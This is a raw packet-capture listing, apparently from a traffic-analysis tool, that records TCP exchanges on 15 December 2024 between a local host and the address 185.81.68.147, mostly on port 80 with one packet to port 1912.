                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.086983919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.087956905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.088048935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.088268995 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.089112997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.089255095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.089582920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.090311050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.090451956 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.090626001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.270684958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.271641970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.271711111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.271785021 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.272818089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.272928953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.273144007 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.273955107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.274056911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.274139881 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.275136948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.275240898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.275371075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.276303053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.276422024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.276494026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.277431011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.277553082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.277626991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.278609037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.278740883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.278809071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.279771090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.279870987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.279952049 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.280942917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.281163931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.281233072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.282092094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.282215118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.282279015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.283262968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.283365965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.283461094 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.284435034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.284533978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.284601927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.285588980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.285768986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.285836935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.286758900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.286849976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.287084103 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.288024902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.288155079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.288220882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.289068937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.289169073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.289529085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.290246964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.290374041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.290441036 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.291380882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.291541100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.291620016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.292643070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.292726040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.292802095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.293745995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.293793917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.293864012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.294863939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.295006037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.295077085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.296020031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.296128035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.296197891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.297190905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.297287941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.297353983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.298356056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.298475981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.298602104 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.299511909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.299606085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.299681902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.300685883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.300848007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.300915003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.301840067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.301924944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.302006006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.302992105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.303097963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.303210020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.304157972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.304300070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.304367065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.305315971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.305421114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.305491924 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.306451082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.306572914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.306643963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.307646036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.307817936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.307904005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.308778048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.489661932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.489759922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.490518093 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.490812063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.490955114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.491020918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.491940022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.492151022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.492430925 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.493149996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.493263960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.494316101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.494381905 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.494393110 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.494452000 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.495424986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.495564938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.495615959 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.496589899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.496685028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.497772932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.497826099 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.497859001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.497898102 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.498925924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.499017000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.499079943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.500065088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.500159979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.500241041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.501250982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.501364946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.501430035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.502394915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.502516031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.502588987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.503571033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.503673077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.503803015 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.504717112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.504771948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.505012989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.505867004 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.505970001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.506027937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.507029057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.507205963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.507265091 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.508198023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.508331060 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.508388042 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.509356022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.509484053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.509609938 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.510515928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.510657072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.510716915 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.511727095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.511861086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.511920929 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.512902975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.513078928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.513134956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.514725924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.514805079 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.514900923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.515517950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.515597105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.515661001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.516320944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.516437054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.516493082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.517494917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.517637968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.517695904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.518604040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.567508936 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.649812937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.650163889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.650228977 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.650361061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.650484085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.650546074 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.651561022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.651669025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.651724100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.652710915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.652797937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.652955055 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.653970957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.653990984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.654062033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.655100107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.655122995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.655181885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.656357050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.657336950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.657351017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.707369089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.707439899 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.708447933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.708571911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.709017992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.709669113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.709686995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.709747076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.710742950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.755032063 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.838109970 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.842231989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.842387915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.842485905 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.842803955 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.842914104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.842958927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.844017982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.844162941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.845309019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.845356941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.845382929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.845427036 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.846661091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.846736908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.846780062 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.847553968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.847573042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.848639965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.848715067 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.848736048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.848784924 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.849760056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.849900007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.849941969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.851129055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.851352930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.851393938 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.852226019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.852243900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.852314949 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.853266001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.853404999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.854410887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.854451895 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.854516029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.854557991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.855566978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.855683088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.856847048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.856911898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.856976986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.857017040 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.857927084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.858057022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.858572960 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.859019041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.859148979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.860263109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.860321999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.860416889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.860455036 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.861377001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.861603022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.862533092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.862576962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.862637997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.863773108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.863842964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.864073038 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:16.864111900 CET4970880192.168.2.5185.81.68.147
